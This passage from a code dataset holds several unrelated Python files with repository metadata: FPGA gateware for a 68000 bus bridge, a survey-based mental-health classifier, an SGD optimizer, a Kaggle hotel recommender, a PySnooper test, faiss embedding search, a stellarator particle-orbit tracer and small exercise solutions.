record\n","repo_name":"ynop/audiomate","sub_path":"audiomate/utils/textfile.py","file_name":"textfile.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"54"} +{"seq_id":"4524519588","text":"#!/usr/bin/env python3\n\nfrom nmigen import *\nfrom nmigen.cli import main\nfrom nmigen_soc import wishbone\nfrom nmigen_soc.memory import MemoryMap\nfrom nmigen_boards.ulx3s import *\nfrom nmigen.build.dsl import *\nfrom ao68000.nmigen import ao68000soc\nfrom wb_to_68k import WishboneTo68000\nfrom m68krom import M68KROM, M68KRAM\n\nclass System(Elaboratable):\n def __init__(self):\n self.ao68000soc = ao68000soc()\n self.wb_to_68k = WishboneTo68000(self.ao68000soc.bus, self.ao68000soc.fc, self.ao68000soc.ipl)\n pass\n\n def elaborate(self, platform):\n m = Module()\n m.domains.sync = ClockDomain()\n clk25 = platform.request(\"clk25\")\n m.d.comb += ClockSignal().eq(clk25.i)\n #hack for ao68000 to start up correctly\n m.d.comb += ResetSignal().eq(platform.request(\"button_fire\",0))\n\n platform.add_resources([\n Resource(\"addr\", 0, Pins(\"24+ 25- 25+ 26- 26+ 27- 27+ 0- 0+ 1- 1+ 2- 2+ 3- 3+ 5+ 6- 6+ 7- 7+ 8- 8+ 9-\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"fc\", 0, Pins(\"5- 4+ 4-\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"data\", 0, Pins(\"20+ 20- 19+ 19- 18+ 18- 17+ 17- 13+ 13- 12+ 12- 11+ 11- 10+ 10-\", dir=\"io\", conn=(\"gpio\", 0))),\n #Resource(\"dtack\", 0, Pins(\"9+\", dir=\"i\", conn=(\"gpio\", 0))),\n #Resource(\"reset\", 0, Pins(\"22+\", dir=\"i\", conn=(\"gpio\", 0))),\n # changed: move dtack to reset pin because of oops on rev 1 pcb\n # then use original dtack line as data_dir\n Resource(\"dtack\", 0, Pins(\"22+\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"data_dir\", 0, Pins(\"9+\", dir=\"o\", conn=(\"gpio\", 0))),\n Resource(\"ipl\", 0, Pins(\"24- 23+ 23-\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"clk\", 0, Pins(\"22-\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"br\", 0, Pins(\"21+\", dir=\"i\", conn=(\"gpio\", 0))),\n Resource(\"bgack\", 0, Pins(\"21-\", dir=\"i\", conn=(\"gpio\", 0))),\n # bg goes through an open collector inverter\n Resource(\"bg\", 0, Pins(\"16+\", dir=\"o\", conn=(\"gpio\", 0))),\n # addr_dir: 0 = read, 1 = write\n # controls: addr, fc, as, uds, lds, rw\n Resource(\"addr_dir\", 0, Pins(\"16-\", dir=\"o\", conn=(\"gpio\", 0))),\n Resource(\"as_\", 0, Pins(\"15+\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"uds_\", 0, Pins(\"15-\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"rw_\", 0, Pins(\"14+\", dir=\"io\", conn=(\"gpio\", 0))),\n Resource(\"lds_\", 0, Pins(\"14-\", dir=\"io\", conn=(\"gpio\", 0)))\n ])\n\n timer = Signal(24)\n m.d.sync += timer.eq(timer + 1)\n\n m.submodules.ao68000soc = self.ao68000soc\n\n m.d.comb += self.wb_to_68k.dtack_.eq(0)\n m.submodules.wb_to_68k = self.wb_to_68k\n\n plat_data = platform.request(\"data\", 0)\n data_dir = platform.request(\"data_dir\")\n\n leds = [platform.request(\"led\", i) for i in range(0,8)]\n for i in range(0, 8):\n m.d.comb += leds[i].eq(self.ao68000soc.bus.adr[i+15])\n\n bus_assert = self.wb_to_68k.bus_assert\n\n m.d.comb += platform.request(\"bg\").o.eq(~self.wb_to_68k.bg_)\n\n # section of signals controlled by rw_\n m.d.comb += plat_data.o.eq(self.wb_to_68k.o_data)\n m.d.comb += self.wb_to_68k.i_data.eq(plat_data.i)\n with m.If(~self.wb_to_68k.rw_ & bus_assert):\n m.d.comb += plat_data.oe.eq(0xFFFF)\n m.d.comb += data_dir.o.eq(1)\n with m.Else():\n m.d.comb += plat_data.oe.eq(0)\n m.d.comb += data_dir.o.eq(0)\n\n # section of signals controlled by bus_assert\n m.d.comb += platform.request(\"addr_dir\").o.eq(bus_assert)\n addr = platform.request(\"addr\", 0)\n fc = platform.request(\"fc\", 0)\n as_ = platform.request(\"as_\")\n uds_ = platform.request(\"uds_\")\n lds_ = platform.request(\"lds_\")\n rw_ = platform.request(\"rw_\")\n m.d.comb += addr.o.eq(self.wb_to_68k.addr)\n m.d.comb += addr.oe.eq(bus_assert)\n m.d.comb += fc.o.eq(self.ao68000soc.fc)\n m.d.comb += fc.oe.eq(bus_assert)\n m.d.comb += as_.o.eq(self.wb_to_68k.as_)\n m.d.comb += as_.oe.eq(bus_assert)\n m.d.comb += uds_.o.eq(self.wb_to_68k.uds_)\n m.d.comb += uds_.oe.eq(bus_assert)\n m.d.comb += lds_.o.eq(self.wb_to_68k.lds_)\n m.d.comb += lds_.oe.eq(bus_assert)\n m.d.comb += rw_.o.eq(self.wb_to_68k.rw_)\n m.d.comb += rw_.oe.eq(bus_assert)\n\n # temporary hack for led counter\n #m.d.comb += self.wb_to_68k.i_data.eq(0)\n\n\n # /----------------------------------------------------------\\\n # | RETURN |\n # \\----------------------------------------------------------/\n return m\n\nif __name__ == \"__main__\":\n platform = ULX3S_85F_Platform()\n sys = System()\n platform.build(sys, do_program=True)\n","repo_name":"tdaede/anubis-gateware","sub_path":"anubis.py","file_name":"anubis.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"990219921","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.svm import LinearSVC\n\nquestions = [\n \"Are you self-employed?\",\n \"How many employees does your company or organization have?\",\n \"Does your employer provide mental health benefits as part of healthcare coverage?\",\n \"Do you know the options for mental health care available under your employer-provided coverage?\",\n \"Has your employer ever formally discussed mental health (for example, as part of a wellness campaign or other official communication)?\",\n \"Does your employer offer resources to learn more about mental health concerns and options for seeking help?\",\n \"Is your anonymity protected if you choose to take advantage of mental health or substance abuse treatment resources provided by your employer?\",\n \"Do you think that discussing a mental health disorder with your employer would have negative consequences?\",\n \"Do you think that discussing a physical health issue with your employer would have negative consequences?\",\n \"Would you feel comfortable discussing a mental health disorder with your coworkers?\",\n \"Would you feel comfortable discussing a mental health disorder with your direct supervisor(s)?\",\n \"Do you feel that your employer takes mental health as seriously as physical health?\",\n \"Have you heard of or observed negative consequences for co-workers who have been open about mental health issues in your workplace?\",\n \"Do you know local or online resources to seek help for a mental health disorder?\",\n \"Do you believe your productivity is ever affected by a mental health issue?\",\n \"Do you have previous employers?\",\n \"Have your previous employers provided mental health benefits?\",\n \"Were you aware of the options for mental health care provided by your previous employers?\",\n \"Did your previous employers ever formally discuss mental health (as part of a wellness campaign or other official communication)?\",\n \"Did your previous employers provide resources to learn more about mental health issues and how to seek help?\",\n \"Do you think that discussing a mental health disorder with previous employers would have negative consequences?\",\n \"Do you think that discussing a physical health issue with previous employers would have negative consequences?\",\n \"Would you have been willing to discuss a mental health issue with your previous co-workers?\",\n \"Would you have been willing to discuss a mental health issue with your direct supervisor(s)?\",\n \"Did you feel that your previous employers took mental health as seriously as physical health?\",\n \"Did you hear of or observe negative consequences for co-workers with mental health issues in your previous workplaces?\",\n \"Would you be willing to bring up a physical health issue with a potential employer in an interview?\",\n \"Would you bring up a mental health issue with a potential employer in an interview?\",\n \"Do you feel that being identified as a person with a mental health issue would hurt your career?\",\n \"Do you think that team members/co-workers would view you more negatively if they knew you suffered from a mental health issue?\",\n \"Have you observed or experienced an unsupportive or badly handled response to a mental health issue in your current or previous workplace?\",\n \"Have your observations of how another individual who discussed a mental health disorder made you less likely to reveal a mental health issue yourself in your current workplace?\",\n \"Do you have a family history of mental illness?\",\n \"Have you had a mental health disorder in the past?\",\n \"Have you been diagnosed with a mental health condition by a medical professional?\",\n \"Do you work remotely?\"\n]\n\n\ndef diff_answers_column(column_of_values):\n unique = []\n for value in column_of_values:\n if value not in unique:\n unique.append(value)\n return unique\n\n\ndef columns_to_list(pandas_columns):\n list_with_column_names = []\n for c in pandas_columns.columns:\n list_with_column_names.append(c)\n return list_with_column_names\n\n\ndef list_to_dict(list_of_options):\n order = 1\n dictionary = {}\n for option in list_of_options:\n if option != \"Nan\":\n dictionary[order] = option\n order += 1\n return dictionary\n\n\ndef encoded(vect):\n enc = LabelEncoder()\n label_encoder = enc.fit(vect)\n t = label_encoder.transform(vect)\n return t\n\n\ndef int_encode_features(data_value, idx):\n return encoded(data_value[:, idx])\n\n\ndf = pd.read_csv(\"mental-heath-in-tech-2016.csv\")\ndf.keys()\nk = []\nfor i in range(1, len(df.keys()) + 1):\n k.append(\"Q\" + str(i))\ndf.columns = k\n\nfor col in df:\n my_new_list = [s for s in df[col] if type(s) != str]\n if len(my_new_list) < len(df[col]):\n df[col] = df[col].replace([None], [\"Nan\"])\n\nnewDF = df.drop(\n [\"Q3\", \"Q4\", \"Q10\", \"Q17\", \"Q19\", \"Q20\", \"Q21\", \"Q22\", \"Q24\", \"Q30\", \"Q38\", \"Q40\", \"Q43\", \"Q49\", \"Q50\", \"Q52\",\n \"Q53\", \"Q54\", \"Q55\", \"Q56\", \"Q57\", \"Q58\", \"Q59\", \"Q60\", \"Q61\", \"Q62\"], axis=1)\n\ntarget = newDF[[\"Q48\"]].copy()\nwithoutTarget = newDF.drop([\"Q48\"], axis=1)\n\nlistOfDictsWithDifferentAnswers = []\nindex = 0\nfor column in withoutTarget:\n listOfDictsWithDifferentAnswers.append(list_to_dict(diff_answers_column(df[column])))\n index += 1\n\n# change possible answers of 1. and 16. question, to make it more readable\nlistOfDictsWithDifferentAnswers[0][1] = \"No\"\nlistOfDictsWithDifferentAnswers[0][2] = \"Yes\"\nlistOfDictsWithDifferentAnswers[15][1] = \"No\"\nlistOfDictsWithDifferentAnswers[15][2] = \"Yes\"\n\nlist_of_columns = columns_to_list(withoutTarget)\n\nnumericalAnswers = []\nfor x in range(len(questions)):\n print(questions[x])\n print(listOfDictsWithDifferentAnswers[x])\n answer = input()\n while not answer.isdigit() or int(answer) < 1 or int(answer) > len(listOfDictsWithDifferentAnswers[x]):\n answer = input()\n numericalAnswers.append(answer)\n\nuserAnswers = []\nfor a in range(len(numericalAnswers)):\n if a == 0:\n if numericalAnswers[a] == \"1\":\n userAnswers.append(0)\n else:\n userAnswers.append(1)\n elif a == 15:\n if numericalAnswers[a] == \"2\":\n userAnswers.append(0)\n else:\n userAnswers.append(1)\n else:\n userAnswers.append(listOfDictsWithDifferentAnswers[a][int(numericalAnswers[a])])\n\nuserRow = pd.DataFrame([userAnswers], columns=list_of_columns)\ncompleteWithout = withoutTarget.append(userRow, ignore_index=True)\n\nuserIllness = pd.DataFrame([\"No\"], columns=[\"Q48\"])\ncompleteTarget = target.append(userIllness, ignore_index=True)\n\ndata = completeWithout.values\n\nfor i in range(completeWithout.shape[1]):\n data[:, i] = int_encode_features(data, i)\ndata = data.astype(float)\ntarget = completeTarget.values.ravel()\n\ndata_without_last = data[:-1, :]\ntarget_without_last = target[:-1]\nuserInfo = data[-1, :].reshape(1, -1)\n\nclf = LinearSVC(random_state=0, max_iter=10000)\nclf.fit(data_without_last, target_without_last) \nprediction = clf.predict(userInfo)\n \nif prediction[0] == 'Yes':\n print(\"Accordingly to our machine learning model you suffer from some kind of mental health disease. You should confirm this result with a doctor. Good luck :)\")\nelif prediction[0] == 'No':\n print(\"Accordingly to our machine learning model you don't suffer from any kind of mental health disease. However you should check it with a doctor.\")\nelse:\n print(\"Our machine learning model couldn't determine your mental health state. You should consider consulting with a doctor.\")\n","repo_name":"MatejMarko/medical_dataset_project","sub_path":"user_prediction.py","file_name":"user_prediction.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8978043237","text":"#QUESTION :Given an integer array nums sorted in non-decreasing order, return an array of the squares of each number sorted in non-decreasing order.\n\n#Following is the function which returns an array after squaring and sorting\ndef sortedSquares(nums):\n arr=[]\n for i in range (0,len(nums)):\n arr.append(nums[i]**2)\n arr.sort()\n return arr\n\n#at leet code platform there was the array provided but here we need to take the array as input from user\nnum=int(input(\"Enter length of the array : \"))\narr=[]\nfor i in range (0,num):\n arr.append(int(input(\"Enter the \"+str(i)+\"th item of array : \")))\n\n#following code prints the desired oputput\nprint(\"The squared sorted array is : \")\nfor i in sortedSquares(arr):\n print(i,end=\" \")","repo_name":"dscpvgcoet/Hacktoberfest2021-DSA-SHEET","sub_path":"PYTHON/ARRAY/Sort_squares-of-a-sorted-array.py","file_name":"Sort_squares-of-a-sorted-array.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4861947684","text":"import numpy as np\n\nclass Optimizer_SGD:\n #initialize otpimizer with learning rate, decay, and momentum, set all to 0\n def __init__(self, learning_rate=1., decay=0., momentum=0.):\n self.learning_rate = learning_rate\n self.current_learning_rate = learning_rate\n self.decay = decay\n self.iterations = 0\n self.momentum = momentum\n\n #call once before parameter updates\n def pre_update_params(self):\n #if we use learning rate decay\n if self.decay:\n self.current_learning_rate = self.learning_rate * (1 / (1 + self.decay * self.iterations))\n\n #update parameters\n def update_params(self, layer):\n #if we use momentum\n if self.momentum:\n #If layer does not have momentum arrays, create them filled with zeros\n if not hasattr(layer, 'weight_momentums'):\n layer.weight_momentums = np.zeros_like(layer.weights)\n #create momentum for biases\n layer.bias_momentums = np.zeros_like(layer.biases)\n\n #create weight updates with added momentum - using previous update\n # updates multiplied by retainment factor and updated with current gradient\n weight_updates = self.momentum * layer.weight_momentums - (self.current_learning_rate * self.dweights)\n layer.weight_momentums = weight_updates\n\n #create bias updates\n bias_updates = self.momentum * layer.bias_momentums - (self.current_learning_rate * self.dbiases)\n layer.bias_momentums = bias_updates\n\n #vanilla SGD (without momentum update)\n else:\n weight_updates = -self.current_learning_rate * layer.dweights\n bias_updates = -self.current_learning_rate * layer.dbiases\n \n # Update weights and biases using either\n # vanilla or momentum updates\n layer.weights += weight_updates\n layer.biases += bias_updates\n\n #call after parameter updates\n def post_update_params(self):\n self.iterations += 1\n","repo_name":"DhruvK0/Neural-Networks-From-Scratch","sub_path":"ANN/optimizer_SGD.py","file_name":"optimizer_SGD.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2413004025","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n# Any results you write to the current directory are saved as output.\n\"\"\"\nauthor: klchang\ncreated time: 2016.6.4\nupdates:\n1. using heap.nlargest instead of sorted and min functions in top_five()\n2. add datetime weight\n\n\"\"\"\nimport time\nimport heapq\n\n\ndef sum_and_count(lst):\n # weight,result = 0.8456, 0.47147; 0.7456, 0.47152; 0.9456, 0.47062; \n weight = 0.7456\n return sum(lst) * weight + len(lst) * (1 - weight)\n\n\ndef top_five(hc):\n sorted_hc = heapq.nlargest(5, hc, key=lambda x:x[0])\n return sorted_hc\n\n\n# function: Pre-process the train data\ndef preprocess(k=5):\n print(\"Pre-processing train dataset...\")\n # data = {}\n search_dest_dict = {}\n popular_hotel_clusters = {}\n total = 0\n with open(\"../input/train.csv\") as fp:\n titles = fp.readline().strip().split(',')\n titles_index = {}\n for i, title in enumerate(titles):\n titles_index[title] = i\n # print(titles)\n # \"is_booking\",\"orig_destination_distance\",\"hotel_cluster\",\"srch_destination_id\"\n ind_dist = titles_index['orig_destination_distance']\n ind_clus = titles_index['hotel_cluster']\n ind_srch_dest_id = titles_index['srch_destination_id']\n ind_user_loc_city = titles_index['user_location_city']\n ind_booking = titles_index['is_booking']\n ind_datetime = titles_index['date_time']\n \n # list(orig_destination_distance, hotel_cluster)\n dest_id_hotel_cluster_count = {}\n # list(srch_destination_id, hotel_cluster)\n dest_id_hotel_cluster_count2 = {}\n for line in fp:\n fields = line.strip().split(',')\n if not fields:\n break\n total += 1\n if total % 1000000 == 0:\n print(\"The count that has been processed in train dataset is %s.\" % total)\n\n cluster = int(fields[ind_clus])\n if cluster not in popular_hotel_clusters:\n popular_hotel_clusters[cluster] = 1\n else:\n popular_hotel_clusters[cluster] += 1\n # Add the fields \"srch_destination_id\" and \"user_location_city\"\n search_dest = fields[ind_srch_dest_id]\n user_city = fields[ind_user_loc_city]\n is_booking = int(fields[ind_booking])\n distance = fields[ind_dist]\n # Add datetime weight\n date_time = fields[ind_datetime]\n if date_time[:4] == '2014':\n is_booking *= 3\n # expedia_train[,sum_and_count(is_booking),by=list(orig_destination_distance, hotel_cluster)]\n count = dest_id_hotel_cluster_count.get((distance, cluster))\n if not count:\n dest_id_hotel_cluster_count[(distance, cluster)] = [is_booking]\n else:\n dest_id_hotel_cluster_count[(distance, cluster)].append(is_booking)\n # expedia_train[,sum_and_count(is_booking),by=list(srch_destination_id, hotel_cluster)]\n count = dest_id_hotel_cluster_count2.get((search_dest, cluster))\n if not count:\n dest_id_hotel_cluster_count2[(search_dest, cluster)] = [is_booking]\n else:\n dest_id_hotel_cluster_count2[(search_dest, cluster)].append(is_booking)\n\n # dest_id_hotel_cluster_count[,top_five(hotel_cluster,V1),by=orig_destination_distance]\n # group by orig_destination_distance, then sort by V1 - sum_and_count(is_booking)\n for key, value in dest_id_hotel_cluster_count.items():\n dest_id_hotel_cluster_count[key] = sum_and_count(value)\n dest_top_five = {}\n # key = (orig_destination_distance, hotel_cluster)\n for key, value in dest_id_hotel_cluster_count.items():\n if not dest_top_five.get(key[0]):\n dest_top_five[key[0]] = [(value, key[1])]\n else:\n dest_top_five[key[0]].append((value, key[1]))\n for key, value in dest_top_five.items():\n dest_top_five[key] = top_five(value)\n\n # dest_id_hotel_cluster_count1[,top_five(hotel_cluster,V1),by=srch_destination_id]\n # group by srch_destination_id, then sort by V1 - sum_and_count(is_booking)\n for key, value in dest_id_hotel_cluster_count2.items():\n dest_id_hotel_cluster_count2[key] = sum_and_count(value)\n dest_top_five2 = {}\n # key = (srch_destination_id, hotel_cluster)\n for key, value in dest_id_hotel_cluster_count2.items():\n if not dest_top_five2.get(key[0]):\n dest_top_five2[key[0]] = [(value, key[1])]\n else:\n dest_top_five2[key[0]].append((value, key[1]))\n for key, value in dest_top_five2.items():\n dest_top_five2[key] = top_five(value)\n # Get top k hotel clusters\n top_hotel_clusters = heapq.nlargest(k, popular_hotel_clusters.items(), key=lambda x: x[1])\n\n data = [dest_top_five, dest_top_five2]\n\n return [data, top_hotel_clusters]\n\n\n# function: Compute the k Nearest Neighbor\n# user_lst = [[dest_top_five, dest_top_five2], top_hotel_clusters]\n# dest_top_five = {orig_destination_distance: [(sum_and_len(is_booking) group by (srch_destination_id, hotel_cluster),\n# hotel_cluster)]}\n# dest_top_five2 = {srch_destination_id: [(sum_and_len(is_booking) group by (srch_destination_id, hotel_cluster),\n# hotel_cluster)]}\ndef computeNearestNeighbor(user, users_lst, k=5):\n # Get the test dataset fields\n user_city, dist, srch_dest = user[1]\n length = 0\n result = []\n if dist and dist in users_lst[0][0].keys():\n result = list(map(lambda x: x[1], users_lst[0][0][dist]))\n length += len(result)\n if length < k and srch_dest in users_lst[0][1].keys():\n tmp = list(map(lambda x: x[1], users_lst[0][1][srch_dest]))\n for clu in result:\n if clu in tmp:\n tmp.remove(clu)\n result += tmp\n length += len(result)\n if length < k:\n # setting to be top clusters\n addition = list(map(lambda x: x[0], users_lst[1]))\n # Remove repetitive clusters\n for clu in result:\n if clu in addition:\n addition.remove(clu)\n result += addition\n \n return result[:k]\n\n\n# function: Test using test dataset\ndef test(train_data):\n # Output result file\n filename = 'submission_%s.csv' % time.strftime(\"%Y%m%d%H\", time.localtime())\n\n with open('../input/test.csv') as fp:\n titles = fp.readline().strip().split(',')\n titles_index = {}\n for i, title in enumerate(titles):\n titles_index[title] = i\n ind_dist = titles_index['orig_destination_distance']\n ind_id = titles_index['id']\n ind_srch_dest = titles_index['srch_destination_id']\n ind_user_loc_city = titles_index['user_location_city']\n \n with open(filename, 'w') as output:\n output.write('id,hotel_cluster\\n')\n for line in fp:\n fields = line.strip().split(',')\n if not fields:\n break\n user_id = fields[ind_id]\n user_city = fields[ind_user_loc_city]\n srch_dest = fields[ind_srch_dest]\n dist = fields[ind_dist]\n user = (user_id, (user_city, dist, srch_dest))\n result = computeNearestNeighbor(user, train_data, 5)\n result = [str(i) for i in result]\n out_str = user_id + ',' + ' '.join(result) + '\\n'\n output.write(out_str)\n\n\n# function: main function \ndef main():\n print(\"Starting ... \")\n sta_time = time.time()\n # Pre-processing Train Data\n data = preprocess()\n preprocess_time = time.time()\n print(\"The pre-processing time is %s seconds.\" % (preprocess_time-sta_time))\n # Test Data\n test(data)\n print(\"The test time is %s seconds.\" % (time.time()-preprocess_time))\n print(\"Ending ... \")\n \nif __name__ == '__main__':\n main()\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/expedia-hotel-recommendations/klchang/multiplevarcluster.py","file_name":"multiplevarcluster.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"11195695313","text":"import io\nimport textwrap\nimport threading\nimport types\nimport sys\n\nfrom pysnooper.utils import truncate\nimport pytest\n\nimport pysnooper\nfrom pysnooper import pycompat\nfrom pysnooper.variables import needs_parentheses\nfrom .utils import (assert_output, assert_sample_output, VariableEntry,\n CallEntry, LineEntry, ReturnEntry, OpcodeEntry,\n ReturnValueEntry, ExceptionEntry, ExceptionValueEntry,\n SourcePathEntry, CallEndedByExceptionEntry,\n ElapsedTimeEntry)\nfrom . import mini_toolbox\n\n\n\ndef test_chinese():\n with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:\n path = folder / 'foo.log'\n @pysnooper.snoop(path, color=False)\n def foo():\n a = 1\n x = '失败'\n return 7\n\n foo()\n with path.open(encoding='utf-8') as file:\n output = file.read()\n assert_output(\n output,\n (\n SourcePathEntry(),\n CallEntry(),\n LineEntry(),\n VariableEntry('a'),\n LineEntry(u\"x = '失败'\"),\n VariableEntry(u'x', (u\"'失败'\" if pycompat.PY3 else None)),\n LineEntry(),\n ReturnEntry(),\n ReturnValueEntry('7'),\n ElapsedTimeEntry(),\n ),\n )\n","repo_name":"cool-RR/PySnooper","sub_path":"tests/test_chinese.py","file_name":"test_chinese.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":16103,"dataset":"github-code","pt":"54"} +{"seq_id":"7311534378","text":"from time import time\n\ndef main():\n\n start = time()\n\n high = fac(10)\n summ = 0\n\n for i in range(3, high):\n if digitsFact(i) == i:\n summ += i\n\n print(summ)\n print(time() - start)\n\ndef digitsFact(n):\n\n stri = str(n)\n total = 0\n\n for i in range(0, len(stri)):\n total += fac(int(stri[i]))\n\n return total\n\ndef fac(x):\n fact = 1\n for i in range(1, x + 1):\n fact *= i\n return fact\n\nif __name__ == '__main__':\n main()\n","repo_name":"this-jacob/project-euler","sub_path":"complete/31 - 40/Problem34/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"408757654","text":"#!/usr/bin/env python2\n# encoding=utf-8\n# must set paths:\n# export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/hieuhoang/intel/compilers_and_libraries_2017.4.196/linux/mkl/lib/intel64_lin\n# export PYTHONPATH=$PYTHONPATH:/home/hieuhoang/workspace/github/faiss\n \nfrom __future__ import print_function\n\nimport argparse\nimport faiss\nimport gzip\nimport itertools\nimport sys\nimport torch\nimport torch.utils.serialization\n\n\ndef _parse_options():\n p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n p.add_argument(\n '--embeddings',\n default='/data/holger/europarl.un16lc/embed.th7/eparl7lu.efs.w50.en.00.efsraz-1allmd.BLSTM.1x512.max.@13.embed',\n help='embeddings file, e.g. \"eparl7lu.efs.w50.en.00.efsraz-1allmd.BLSTM.1x512.max.@13.embed\"')\n p.add_argument(\n '--sentences',\n default='/data/holger/europarl.un16lc/data.norm.un6lc/eparl7lu.efs.w50.en.gz',\n help=('sentences (order of the lines and embeddings is expected to be identical), e.g.' +\n ' \"eparl7lu.efs.w50.en.gz\"'))\n p.add_argument(\n '--offset',\n default=0,\n help='embeddings file offset (0 for the example emddings file)')\n p.add_argument(\n '--sent-index',\n default=100500,\n help='sentence index to search for', )\n p.add_argument(\n '-k',\n default=10,\n help='number of nearest neighbors to search for', )\n return p.parse_args()\n\n\ndef _open(path, mode):\n if path.endswith('.gz'):\n return gzip.open(path, mode)\n return open(path, mode)\n\n\ndef _main(a):\n print('Loading embeddings...')\n sys.stdout.flush()\n t = torch.utils.serialization.load_lua(a.embeddings)\n\n print('Loading sentences...')\n sys.stdout.flush()\n sent = _open(a.sentences, 'rb').readlines()\n\n res = faiss.StandardGpuResources()\n index = faiss.GpuIndexFlatIP(res, t.size()[1])\n print('Building index on GPU...')\n sys.stdout.flush()\n index.add(x=t.numpy())\n\n print('Searching index...')\n sys.stdout.flush()\n distances, indices = index.search(x=t[a.sent_index:a.sent_index + 1].numpy(), k=a.k)\n\n print('Searched for: \"{}\"'.format(sent[a.sent_index].encode('string-escape')))\n print('Nearest neighbors (distance \\\\t index \\\\t sentence):')\n for d, i in itertools.izip(distances[0], indices[0]):\n j = i + a.offset\n c_sentence = sent[j].encode('string-escape')\n print('{dist:.2f}\\t{index}\\t\"{sentence}\"'.format(dist=d, index=j, sentence=c_sentence))\n sys.stdout.flush()\n\n print('Done')\n sys.stdout.flush()\n\n\nif '__main__' == __name__:\n a = _parse_options()\n sys.exit(_main(a) or 0)\n","repo_name":"paracrawl/embedding","sub_path":"embed_index/load_build_search_example.py","file_name":"load_build_search_example.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"32398525485","text":"#!/usr/bin/env python\n\nfrom neat.fields import Simple # isort:skip\nfrom neat.tracing import ChargedParticle, ParticleOrbit # isort:skip\nimport os\nimport time\n\nimport numpy as np\n\n\"\"\" \nTrace the orbit of a single particle in a\nquasisymmetric stellarator \n\"\"\"\n\n# Initialize an alpha particle at a radius = r_initial\nr_initial = 0.2 # initial normalized toroidal magnetic flux (radial VMEC coordinate)\ntheta_initial = np.pi / 2 # initial poloidal angle\nphi_initial = 1.2 # initial poloidal angle\nenergy = 3.52e6 # electron-volt\ncharge = 2 # times charge of proton\nmass = 4 # times mass of proton\nLambda = 0.96 # = mu * B0 / energy\nvpp_sign = -1 # initial sign of the parallel velocity, +1 or -1\nnsamples = 100 # IGNORED - resolution in time\ntfinal = 2e-4 # seconds\nwout_filename = os.path.join(os.path.dirname(__file__), \"inputs\", \"wout_ARIESCS.nc\")\nB_scale = 1 # Scale the magnetic field by a factor\nAminor_scale = 1 # Scale the machine size by a factor\n\ng_field = Simple(\n wout_filename=wout_filename, B_scale=B_scale, Aminor_scale=Aminor_scale\n)\ng_particle = ChargedParticle(\n r_initial=r_initial,\n theta_initial=theta_initial,\n phi_initial=phi_initial,\n energy=energy,\n Lambda=Lambda,\n charge=charge,\n mass=mass,\n vpp_sign=vpp_sign,\n)\nprint(\"Starting particle tracer\")\nstart_time = time.time()\ng_orbit = ParticleOrbit(g_particle, g_field, nsamples=nsamples, tfinal=tfinal)\ntotal_time = time.time() - start_time\nprint(f\"Finished in {total_time}s\")\n\nprint(\"Creating B contour plot\")\ng_orbit.plot_orbit_contourB(show=False)\n\nprint(\"Creating parameter plot\")\ng_orbit.plot(show=False)\n\nprint(\"Creating 2D plot\")\ng_orbit.plot_orbit(show=False)\n\nprint(\"Creating 3D plot\")\ng_orbit.plot_orbit_3d(show=True)\n\nprint(\"Creating animation plot\")\ng_orbit.plot_animation(show=True)\n","repo_name":"rogeriojorge/NEAT","sub_path":"examples/plot_single_orbit_simple.py","file_name":"plot_single_orbit_simple.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"38793645472","text":"\nimport json as js\nimport yaml as ym\n\ndef convertJson2Yaml(ifname):\n\tfp = open(ifname, 'r')\n\tres = fp.read()\n\tfp.close()\n\n\tres = js.loads(res)\n\tres = ym.dump(res)\n\t\n\treturn(res)\n\nif __name__ == \"__main__\":\n\timport argparse\n\t## source: https://docs.python.org/2/howto/argparse.html\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\"-c\", '--convert', help=\"convert\", action=\"store_true\")\n\tparser.add_argument(\"-f\", '--ifname', help=\"input file\")\n\tparser.add_argument(\"-o\", '--ofname', help=\"output file\")\n\n\targs = parser.parse_args()\n\t\n\tif args.convert:\n\n\t\tifname = str(args.ifname)\n\t\tres = convertJson2Yaml(ifname)\n\t\t\n\t\tfp = open(args.ofname, 